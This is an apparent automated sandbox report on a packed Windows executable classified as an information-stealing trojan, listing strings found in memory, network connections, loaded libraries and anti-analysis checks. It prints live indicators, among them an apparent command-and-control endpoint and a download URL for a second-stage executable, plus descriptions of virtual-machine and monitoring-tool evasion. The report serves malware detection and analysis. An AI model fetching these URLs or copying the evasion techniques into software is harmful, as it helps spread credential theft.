                Source: LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeX
                Source: LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exed
                Source: LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1505886935.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399489133.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/7
                Source: LP4a6BowQN.exe, 00000000.00000003.1425120047.000000000549E000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/a
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1424948648.0000000005499000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: LP4a6BowQN.exe, 00000000.00000003.1449986604.00000000054A1000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450463340.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1450513722.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449717243.000000000549D000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1449804953.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apim
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/d
                Source: LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
                Source: LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/t
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: LP4a6BowQN.exeString found in binary or memory: https://dz8aopenkvv6s.cloudfront.
                Source: LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.182.101.249:443 -> 192.168.2.7:49775 version: TLS 1.2

                System Summary

Source: LP4a6BowQN.exe | Static PE information: section name:
Source: LP4a6BowQN.exe | Static PE information: section name: .rsrc
Source: LP4a6BowQN.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
Source: LP4a6BowQN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: LP4a6BowQN.exe | Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7624
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7cd8ee41-2b51-4a0d-a647-65f181f050c9
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LP4a6BowQN.exe, 00000000.00000003.1400773859.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400579820.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1426977779.00000000054C7000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1427362016.00000000054BA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: LP4a6BowQN.exe | ReversingLabs: Detection: 57%
Source: LP4a6BowQN.exe | Virustotal: Detection: 58%
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File read: C:\Users\user\Desktop\LP4a6BowQN.exe
Source: unknown | Process created: C:\Users\user\Desktop\LP4a6BowQN.exe "C:\Users\user\Desktop\LP4a6BowQN.exe"
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Section loaded: ondemandconnroutehelper.dll
Source: LP4a6BowQN.exe | Static file information: File size 2969088 > 1048576
Source: LP4a6BowQN.exe | Static PE information: Raw size of nxyovwhs is bigger than: 0x100000 < 0x2ace00

                Data Obfuscation

                Source: C:\Users\user\Desktop\LP4a6BowQN.exeUnpacked PE file: 0.2.LP4a6BowQN.exe.7e0000.0.unpack :EW;.rsrc :W;.idata :W;nxyovwhs:EW;mlwhfqbs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nxyovwhs:EW;mlwhfqbs:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: LP4a6BowQN.exeStatic PE information: real checksum: 0x2dbbb9 should be: 0x2d6751
                Source: LP4a6BowQN.exeStatic PE information: section name:
                Source: LP4a6BowQN.exeStatic PE information: section name: .rsrc
                Source: LP4a6BowQN.exeStatic PE information: section name: .idata
                Source: LP4a6BowQN.exeStatic PE information: section name: nxyovwhs
                Source: LP4a6BowQN.exeStatic PE information: section name: mlwhfqbs
                Source: LP4a6BowQN.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFB98D push 9800B9C2h; ret 0_3_00BFB999
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFA5EC push eax; ret 0_3_00BFA5ED
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFA8EB push eax; iretd 0_3_00BFA8F1
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFCAE5 pushad ; retf 0_3_00BFCB19
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFC9E2 pushad ; retf 0_3_00BFC9F9
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BFCBD0 pushad ; retf 0_3_00BFCBD9
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00BF9EC1 push edi; retf 0_3_00BF9ED4
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00C1E739 push ebp; iretd 0_3_00C1E73C
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Code function: 0_3_00B8DBD0 pushad ; retf 0_3_00B8DBEA
                Source: LP4a6BowQN.exe | Static PE information: section name: entropy: 7.980570361572185

                Boot Survival

                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 837D6A second address: 837D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B940F second address: 9B941F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 jnc 00007FC8BCD07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B86B1 second address: 9B86C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC8BCFEEF06h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B86C7 second address: 9B86EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCD07016h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD07029h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B86EC second address: 9B870C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC8BCFEEF06h 0x00000009 jmp 00007FC8BCFEEF11h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B8C8A second address: 9B8CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07023h 0x00000009 jmp 00007FC8BCD07023h 0x0000000e jp 00007FC8BCD0701Eh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9B8CC5 second address: 9B8CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
